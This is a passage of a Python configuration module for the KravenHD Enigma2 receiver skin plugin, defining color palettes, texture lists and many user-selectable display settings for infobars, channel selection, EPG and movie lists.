dark\")),\n\t(\"1B1775\", _(\"blue\")),\n\t(\"0E0C3F\", _(\"blue dark\")),\n\t(\"03001E\", _(\"blue very dark\")),\n\t(\"7D5929\", _(\"brown\")),\n\t(\"3F2D15\", _(\"brown dark\")),\n\t(\"180B00\", _(\"brown very dark\")),\n\t(\"0050EF\", _(\"cobalt\")),\n\t(\"001F59\", _(\"cobalt dark\")),\n\t(\"000E2B\", _(\"cobalt very dark\")),\n\t(\"1BA1E2\", _(\"cyan\")),\n\t(\"0F5B7F\", _(\"cyan dark\")),\n\t(\"01263D\", _(\"cyan very dark\")),\n\t(\"FFEA04\", _(\"yellow\")),\n\t(\"999999\", _(\"grey\")),\n\t(\"3F3F3F\", _(\"grey dark\")),\n\t(\"1C1C1C\", _(\"grey very dark\")),\n\t(\"70AD11\", _(\"green\")),\n\t(\"213305\", _(\"green dark\")),\n\t(\"001203\", _(\"green very dark\")),\n\t(\"A19181\", _(\"Kraven\")),\n\t(\"28150B\", _(\"Kraven dark\")),\n\t(\"1D130B\", _(\"Kraven very dark\")),\n\t(\"6D8764\", _(\"olive\")),\n\t(\"313D2D\", _(\"olive dark\")),\n\t(\"161C12\", _(\"olive very dark\")),\n\t(\"C3461B\", _(\"orange\")),\n\t(\"892E13\", _(\"orange dark\")),\n\t(\"521D00\", _(\"orange very dark\")),\n\t(\"F472D0\", _(\"pink\")),\n\t(\"723562\", _(\"pink dark\")),\n\t(\"2F0029\", _(\"pink very dark\")),\n\t(\"E51400\", _(\"red\")),\n\t(\"330400\", _(\"red dark\")),\n\t(\"240004\", _(\"red very dark\")),\n\t(\"000000\", _(\"black\")),\n\t(\"008A00\", _(\"emerald\")),\n\t(\"647687\", _(\"steel\")),\n\t(\"262C33\", _(\"steel dark\")),\n\t(\"131619\", _(\"steel very dark\")),\n\t(\"6C0AAB\", _(\"violet\")),\n\t(\"1F0333\", _(\"violet dark\")),\n\t(\"11001E\", _(\"violet very dark\")),\n\t(\"ffffff\", _(\"white\"))\n\t]\n\nTextureList = []\n\nfor i in range(1, 50):\n\tn=str(i)\n\tif fileExists(\"/usr/share/enigma2/Kraven-user-icons/usertexture\"+n+\".png\") or fileExists(\"/usr/share/enigma2/Kraven-user-icons/usertexture\"+n+\".jpg\"):\n\t\tTextureList.append((\"usertexture\"+n, _(\"user texture\")+\" \"+n))\nfor i in range(1, 50):\n\tn=str(i)\n\tif fileExists(\"/usr/share/enigma2/KravenHD/textures/texture\"+n+\".png\") or fileExists(\"/usr/share/enigma2/KravenHD/textures/texture\"+n+\".jpg\"):\n\t\tTextureList.append((\"texture\"+n, _(\"texture\")+\" \"+n))\n\nBorderSelfList = deepcopy(ColorSelfList)\nBorderSelfList.append((\"none\", _(\"off\")))\n\nBackgroundSelfList = deepcopy(BackgroundList)\nBackgroundSelfList.append((\"self\", _(\"self\")))\n\nBackgroundSelfGradientList = deepcopy(BackgroundSelfList)\nBackgroundSelfGradientList.append((\"gradient\", _(\"gradient\")))\n\nBackgroundSelfTextureList = deepcopy(BackgroundSelfList)\nBackgroundSelfTextureList.append((\"texture\", _(\"texture\")))\n\nBackgroundSelfGradientTextureList = deepcopy(BackgroundSelfGradientList)\nBackgroundSelfGradientTextureList.append((\"texture\", _(\"texture\")))\n\nTransList = [\n\t(\"00\", \"0%\"),\n\t(\"0C\", \"5%\"),\n\t(\"18\", \"10%\"),\n\t(\"32\", \"20%\"),\n\t(\"58\", \"35%\"),\n\t(\"7E\", \"50%\")\n\t]\n\nProgressList = [\n\t(\"F0A30A\", _(\"amber\")),\n\t(\"B27708\", _(\"amber dark\")),\n\t(\"1B1775\", _(\"blue\")),\n\t(\"0E0C3F\", _(\"blue dark\")),\n\t(\"7D5929\", _(\"brown\")),\n\t(\"3F2D15\", _(\"brown dark\")),\n\t(\"progress\", _(\"colorfull\")),\n\t(\"0050EF\", _(\"cobalt\")),\n\t(\"001F59\", _(\"cobalt dark\")),\n\t(\"1BA1E2\", _(\"cyan\")),\n\t(\"0F5B7F\", _(\"cyan dark\")),\n\t(\"FFEA04\", _(\"yellow\")),\n\t(\"999999\", _(\"grey\")),\n\t(\"3F3F3F\", _(\"grey dark\")),\n\t(\"70AD11\", _(\"green\")),\n\t(\"213305\", _(\"green dark\")),\n\t(\"A19181\", _(\"Kraven\")),\n\t(\"28150B\", _(\"Kraven dark\")),\n\t(\"6D8764\", _(\"olive\")),\n\t(\"313D2D\", _(\"olive dark\")),\n\t(\"C3461B\", 
_(\"orange\")),\n\t(\"892E13\", _(\"orange dark\")),\n\t(\"F472D0\", _(\"pink\")),\n\t(\"723562\", _(\"pink dark\")),\n\t(\"E51400\", _(\"red\")),\n\t(\"330400\", _(\"red dark\")),\n\t(\"000000\", _(\"black\")),\n\t(\"008A00\", _(\"emerald\")),\n\t(\"647687\", _(\"steel\")),\n\t(\"262C33\", _(\"steel dark\")),\n\t(\"6C0AAB\", _(\"violet\")),\n\t(\"1F0333\", _(\"violet dark\")),\n\t(\"ffffff\", _(\"white\")),\n\t(\"self\", _(\"self\"))\n\t]\n\nconfig.plugins.KravenHD = ConfigSubsection()\nconfig.plugins.KravenHD.Primetime = ConfigClock(default=time.mktime((0, 0, 0, 20, 15, 0, 0, 0, 0)))\nconfig.plugins.KravenHD.InfobarAntialias = ConfigSlider(default=10, increment=1, limits=(0, 20))\nconfig.plugins.KravenHD.ECMLineAntialias = ConfigSlider(default=10, increment=1, limits=(0, 20))\nconfig.plugins.KravenHD.ScreensAntialias = ConfigSlider(default=10, increment=1, limits=(0, 20))\nconfig.plugins.KravenHD.SelfColorR = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.SelfColorG = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.SelfColorB = ConfigSlider(default=75, increment=5, limits=(0, 255))\n\nconfig.plugins.KravenHD.customProfile = ConfigSelection(default=\"1\", choices = [\n\t\t\t\t(\"1\", _(\"1\")),\n\t\t\t\t(\"2\", _(\"2\")),\n\t\t\t\t(\"3\", _(\"3\")),\n\t\t\t\t(\"4\", _(\"4\")),\n\t\t\t\t(\"5\", _(\"5\"))\n\t\t\t\t])\n\nprofList = [(\"default\", _(\"0 (hardcoded)\"))]\nfor i in range(1, 21):\n\tn = name = str(i)\n\tif fileExists(\"/etc/enigma2/kravenhd_default_\" + n):\n\t\tif i == 1:\n\t\t\tname = '1 ' + _(\"MiniTV\")\n\t\telif i == 2:\n\t\t\tname = '2 ' + _(\"dark\")\n\t\telif i == 3:\n\t\t\tname = '3 ' + _(\"light\")\n\t\telif i == 4:\n\t\t\tname = '4 ' + _(\"colored\")\n\t\tprofList.append((n, _(name)))\nconfig.plugins.KravenHD.defaultProfile = ConfigSelection(default=\"default\", choices = profList)\n\t\t\t\t\nconfig.plugins.KravenHD.refreshInterval = ConfigSelection(default=\"60\", choices = [\n\t\t\t\t(\"15\", _(\"15\")),\n\t\t\t\t(\"30\", _(\"30\")),\n\t\t\t\t(\"60\", _(\"60\")),\n\t\t\t\t(\"120\", _(\"120\")),\n\t\t\t\t(\"240\", _(\"240\")),\n\t\t\t\t(\"480\", _(\"480\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Volume = ConfigSelection(default=\"volume-border\", choices = [\n\t\t\t\t(\"volume-original\", _(\"original\")),\n\t\t\t\t(\"volume-border\", _(\"with Border\")),\n\t\t\t\t(\"volume-left\", _(\"left\")),\n\t\t\t\t(\"volume-right\", _(\"right\")),\n\t\t\t\t(\"volume-top\", _(\"top\")),\n\t\t\t\t(\"volume-center\", _(\"center\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.BackgroundColorTrans = ConfigSelection(default=\"32\", choices = TransList)\n\nconfig.plugins.KravenHD.InfobarColorTrans = ConfigSelection(default=\"00\", choices = TransList)\n\nconfig.plugins.KravenHD.BackgroundListColor = ConfigSelection(default=\"self\", choices = BackgroundSelfGradientTextureList)\nconfig.plugins.KravenHD.BackgroundSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BackgroundAlternateListColor = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.BackgroundAlternateSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundAlternateColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarGradientListColor = ConfigSelection(default=\"self\", choices = BackgroundSelfTextureList)\nconfig.plugins.KravenHD.InfobarGradientSelfColor = 
ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarGradientColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarBoxListColor = ConfigSelection(default=\"self\", choices = BackgroundSelfGradientTextureList)\nconfig.plugins.KravenHD.InfobarBoxSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarBoxColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarAlternateListColor = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.InfobarAlternateSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarAlternateColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BackgroundGradientListColorPrimary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.BackgroundGradientSelfColorPrimary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundGradientColorPrimary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BackgroundGradientListColorSecondary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.BackgroundGradientSelfColorSecondary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundGradientColorSecondary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarGradientListColorPrimary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.InfobarGradientSelfColorPrimary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarGradientColorPrimary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarGradientListColorSecondary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.InfobarGradientSelfColorSecondary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarGradientColorSecondary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.Font1List = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.Font1Self = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.Font1 = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.Font2List = ConfigSelection(default=\"F0A30A\", choices = ColorSelfList)\nconfig.plugins.KravenHD.Font2Self = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.Font2 = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.IBFont1List = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBFont1Self = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBFont1 = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBFont2List = ConfigSelection(default=\"F0A30A\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBFont2Self = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.IBFont2 = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.PermanentClockFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.PermanentClockFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.PermanentClockFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.SelectionFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.SelectionFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.SelectionFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.MarkedFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MarkedFontSelf = 
ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.MarkedFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.ECMFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ECMFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.ECMFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.ChannelnameFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ChannelnameFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.ChannelnameFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.PrimetimeFontList = ConfigSelection(default=\"70AD11\", choices = ColorSelfList)\nconfig.plugins.KravenHD.PrimetimeFontSelf = ConfigText(default=\"70AD11\")\nconfig.plugins.KravenHD.PrimetimeFont = ConfigText(default=\"70AD11\")\n\nconfig.plugins.KravenHD.ButtonTextList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ButtonTextSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.ButtonText = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.AndroidList = ConfigSelection(default=\"000000\", choices = ColorSelfList)\nconfig.plugins.KravenHD.AndroidSelf = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.Android = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BorderList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.BorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.Border = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.ProgressList = ConfigSelection(default=\"C3461B\", choices = ProgressList)\nconfig.plugins.KravenHD.ProgressSelf = ConfigText(default=\"C3461B\")\nconfig.plugins.KravenHD.Progress = ConfigText(default=\"C3461B\")\n\nconfig.plugins.KravenHD.LineList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.LineSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.Line = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBLineList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBLineSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBLine = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBStyle = ConfigSelection(default=\"grad\", choices = [\n\t\t\t\t(\"grad\", _(\"gradient\")),\n\t\t\t\t(\"box\", _(\"box\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfoStyle = ConfigSelection(default=\"gradient\", choices = [\n\t\t\t\t(\"gradient\", _(\"gradient\")),\n\t\t\t\t(\"primary\", _(\" Primary Color\")),\n\t\t\t\t(\"secondary\", _(\" Secondary Color\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfobarTexture = ConfigSelection(default=\"texture1\", choices = TextureList)\n\t\t\t\t\nconfig.plugins.KravenHD.BackgroundTexture = ConfigSelection(default=\"texture1\", choices = TextureList)\n\nconfig.plugins.KravenHD.SelectionStyle = ConfigSelection(default=\"color\", choices = [\n\t\t\t\t(\"color\", _(\"solid color\")),\n\t\t\t\t(\"pixmap\", _(\"two-colored\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SelectionBackgroundList = ConfigSelection(default=\"0050EF\", choices = ColorSelfList)\nconfig.plugins.KravenHD.SelectionBackgroundSelf = ConfigText(default=\"0050EF\")\nconfig.plugins.KravenHD.SelectionBackground = ConfigText(default=\"0050EF\")\n\nconfig.plugins.KravenHD.SelectionBackground2List = ConfigSelection(default=\"001F59\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.SelectionBackground2Self = 
ConfigText(default=\"001F59\")\nconfig.plugins.KravenHD.SelectionBackground2 = ConfigText(default=\"001F59\")\n\nconfig.plugins.KravenHD.SelectionBorderList = ConfigSelection(default=\"ffffff\", choices = BorderSelfList)\nconfig.plugins.KravenHD.SelectionBorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.SelectionBorder = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.MiniTVBorderList = ConfigSelection(default=\"3F3F3F\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MiniTVBorderSelf = ConfigText(default=\"3F3F3F\")\nconfig.plugins.KravenHD.MiniTVBorder = ConfigText(default=\"3F3F3F\")\n\nconfig.plugins.KravenHD.AnalogColorList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.AnalogColorSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.AnalogColor = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.InfobarStyle = ConfigSelection(default=\"infobar-style-x3\", choices = [\n\t\t\t\t(\"infobar-style-nopicon\", _(\"no Picon\")),\n\t\t\t\t(\"infobar-style-x1\", _(\"X1\")),\n\t\t\t\t(\"infobar-style-x2\", _(\"X2\")),\n\t\t\t\t(\"infobar-style-x3\", _(\"X3\")),\n\t\t\t\t(\"infobar-style-z1\", _(\"Z1\")),\n\t\t\t\t(\"infobar-style-z2\", _(\"Z2\")),\n\t\t\t\t(\"infobar-style-zz1\", _(\"ZZ1\")),\n\t\t\t\t(\"infobar-style-zz2\", _(\"ZZ2\")),\n\t\t\t\t(\"infobar-style-zz3\", _(\"ZZ3\")),\n\t\t\t\t(\"infobar-style-zzz1\", _(\"ZZZ1\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfobarChannelName = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"infobar-channelname-small\", _(\"Name small\")),\n\t\t\t\t(\"infobar-channelname-number-small\", _(\"Name & Number small\")),\n\t\t\t\t(\"infobar-channelname\", _(\"Name big\")),\n\t\t\t\t(\"infobar-channelname-number\", _(\"Name & Number big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfobarChannelName2 = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"infobar-channelname-small\", _(\"Name\")),\n\t\t\t\t(\"infobar-channelname-number-small\", _(\"Name & Number\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBFontSize = ConfigSelection(default=\"big\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"middle\", _(\"middle\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.TypeWriter = ConfigSelection(default=\"runningtext\", choices = [\n\t\t\t\t(\"typewriter\", _(\"typewriter\")),\n\t\t\t\t(\"runningtext\", _(\"runningtext\")),\n\t\t\t\t(\"none\", _(\"off\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionStyle = ConfigSelection(default=\"channelselection-style-minitv\", choices = [\n\t\t\t\t(\"channelselection-style-nopicon\", _(\"no Picon\")),\n\t\t\t\t(\"channelselection-style-nopicon2\", _(\"no Picon2\")),\n\t\t\t\t(\"channelselection-style-xpicon\", _(\"X-Picons\")),\n\t\t\t\t(\"channelselection-style-zpicon\", _(\"Z-Picons\")),\n\t\t\t\t(\"channelselection-style-zzpicon\", _(\"ZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-zzzpicon\", _(\"ZZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-minitv\", _(\"MiniTV left\")),\n\t\t\t\t(\"channelselection-style-minitv4\", _(\"MiniTV right\")),\n\t\t\t\t(\"channelselection-style-minitv3\", _(\"Preview\")),\n\t\t\t\t(\"channelselection-style-nobile\", _(\"Nobile\")),\n\t\t\t\t(\"channelselection-style-nobile2\", _(\"Nobile 2\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv\", _(\"Nobile MiniTV\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv3\", _(\"Nobile 
Preview\")),\n\t\t\t\t(\"channelselection-style-minitv-picon\", _(\"MiniTV Picon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionStyle2 = ConfigSelection(default=\"channelselection-style-minitv\", choices = [\n\t\t\t\t(\"channelselection-style-nopicon\", _(\"no Picon\")),\n\t\t\t\t(\"channelselection-style-nopicon2\", _(\"no Picon2\")),\n\t\t\t\t(\"channelselection-style-xpicon\", _(\"X-Picons\")),\n\t\t\t\t(\"channelselection-style-zpicon\", _(\"Z-Picons\")),\n\t\t\t\t(\"channelselection-style-zzpicon\", _(\"ZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-zzzpicon\", _(\"ZZZ-Picons\")),\n\t\t\t\t(\"channelselection-style-minitv\", _(\"MiniTV left\")),\n\t\t\t\t(\"channelselection-style-minitv4\", _(\"MiniTV right\")),\n\t\t\t\t(\"channelselection-style-minitv3\", _(\"Preview\")),\n\t\t\t\t(\"channelselection-style-minitv33\", _(\"Extended Preview\")),\n\t\t\t\t(\"channelselection-style-minitv2\", _(\"Dual TV\")),\n\t\t\t\t(\"channelselection-style-minitv22\", _(\"Dual TV 2\")),\n\t\t\t\t(\"channelselection-style-nobile\", _(\"Nobile\")),\n\t\t\t\t(\"channelselection-style-nobile2\", _(\"Nobile 2\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv\", _(\"Nobile MiniTV\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv3\", _(\"Nobile Preview\")),\n\t\t\t\t(\"channelselection-style-nobile-minitv33\", _(\"Nobile Extended Preview\")),\n\t\t\t\t(\"channelselection-style-minitv-picon\", _(\"MiniTV Picon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionMode = ConfigSelection(default=\"zap\", choices = [\n\t\t\t\t(\"zap\", _(\"Zap (1xOK)\")),\n\t\t\t\t(\"preview\", _(\"Preview (2xOK)\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionTrans = ConfigSelection(default=\"32\", choices = TransList)\n\nconfig.plugins.KravenHD.ChannelSelectionEPGSize1 = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionEPGSize2 = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionEPGSize3 = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.ChannelSelectionServiceNAList = ConfigSelection(default=\"FFEA04\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ChannelSelectionServiceNASelf = ConfigText(default=\"FFEA04\")\nconfig.plugins.KravenHD.ChannelSelectionServiceNA = ConfigText(default=\"FFEA04\")\n\nconfig.plugins.KravenHD.NumberZapExt = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"numberzapext-xpicon\", _(\"X-Picons\")),\n\t\t\t\t(\"numberzapext-zpicon\", _(\"Z-Picons\")),\n\t\t\t\t(\"numberzapext-zzpicon\", _(\"ZZ-Picons\")),\n\t\t\t\t(\"numberzapext-zzzpicon\", _(\"ZZZ-Picons\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.NZBorderList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.NZBorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.NZBorder = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.CoolTVGuide = ConfigSelection(default=\"cooltv-minitv\", choices = [\n\t\t\t\t(\"cooltv-minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"cooltv-picon\", _(\"Picon\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.GraphicalEPG = ConfigSelection(default=\"text-minitv\", choices = [\n\t\t\t\t(\"text\", _(\"Text\")),\n\t\t\t\t(\"text-minitv\", _(\"Text with 
MiniTV\")),\n\t\t\t\t(\"graphical\", _(\"graphical\")),\n\t\t\t\t(\"graphical-minitv\", _(\"graphical with MiniTV\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.GMEDescriptionSize = ConfigSelection(default=\"small\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.GMESelFgList = ConfigSelection(default=\"ffffff\", choices = [\n\t\t\t\t(\"ffffff\", _(\"white\")),\n\t\t\t\t(\"F0A30A\", _(\"amber\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMESelFgSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.GMESelFg = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.GMESelBgList = ConfigSelection(default=\"389416\", choices = [\n\t\t\t\t(\"389416\", _(\"green\")),\n\t\t\t\t(\"0064c7\", _(\"blue\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMESelBgSelf = ConfigText(default=\"389416\")\nconfig.plugins.KravenHD.GMESelBg = ConfigText(default=\"389416\")\n\nconfig.plugins.KravenHD.GMENowFgList = ConfigSelection(default=\"F0A30A\", choices = [\n\t\t\t\t(\"ffffff\", _(\"white\")),\n\t\t\t\t(\"F0A30A\", _(\"amber\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMENowFgSelf = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.GMENowFg = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.GMENowBgList = ConfigSelection(default=\"0064c7\", choices = [\n\t\t\t\t(\"389416\", _(\"green\")),\n\t\t\t\t(\"0064c7\", _(\"blue\")),\n\t\t\t\t(\"self\", _(\"self\"))\n\t\t\t\t])\nconfig.plugins.KravenHD.GMENowBgSelf = ConfigText(default=\"0064c7\")\nconfig.plugins.KravenHD.GMENowBg = ConfigText(default=\"0064c7\")\n\nconfig.plugins.KravenHD.GMEBorderList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.GMEBorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.GMEBorder = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.MovieSelection = ConfigSelection(default=\"movieselection-no-cover\", choices = [\n\t\t\t\t(\"movieselection-no-cover\", _(\"no Cover\")),\n\t\t\t\t(\"movieselection-no-cover2\", _(\"no Cover2\")),\n\t\t\t\t(\"movieselection-small-cover\", _(\"small Cover\")),\n\t\t\t\t(\"movieselection-big-cover\", _(\"big Cover\")),\n\t\t\t\t(\"movieselection-minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"movieselection-minitv-cover\", _(\"MiniTV + Cover\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EPGSelection = ConfigSelection(default=\"epgselection-standard\", choices = [\n\t\t\t\t(\"epgselection-standard\", _(\"standard\")),\n\t\t\t\t(\"epgselection-minitv\", _(\"MiniTV\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.EMCStyle = ConfigSelection(default=\"emc-minitv\", choices = [\n\t\t\t\t(\"emc-nocover\", _(\"no Cover\")),\n\t\t\t\t(\"emc-nocover2\", _(\"no Cover2\")),\n\t\t\t\t(\"emc-smallcover\", _(\"small Cover\")),\n\t\t\t\t(\"emc-smallcover2\", _(\"small Cover2\")),\n\t\t\t\t(\"emc-bigcover\", _(\"big Cover\")),\n\t\t\t\t(\"emc-bigcover2\", _(\"big Cover2\")),\n\t\t\t\t(\"emc-verybigcover\", _(\"very big Cover\")),\n\t\t\t\t(\"emc-verybigcover2\", _(\"very big Cover2\")),\n\t\t\t\t(\"emc-minitv\", _(\"MiniTV\")),\n\t\t\t\t(\"emc-minitv2\", _(\"MiniTV2\")),\n\t\t\t\t(\"emc-full\", _(\"full\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.RunningText = ConfigSelection(default=\"startdelay=4000\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"startdelay=2000\", _(\"2 sec\")),\n\t\t\t\t(\"startdelay=4000\", _(\"4 sec\")),\n\t\t\t\t(\"startdelay=6000\", _(\"6 
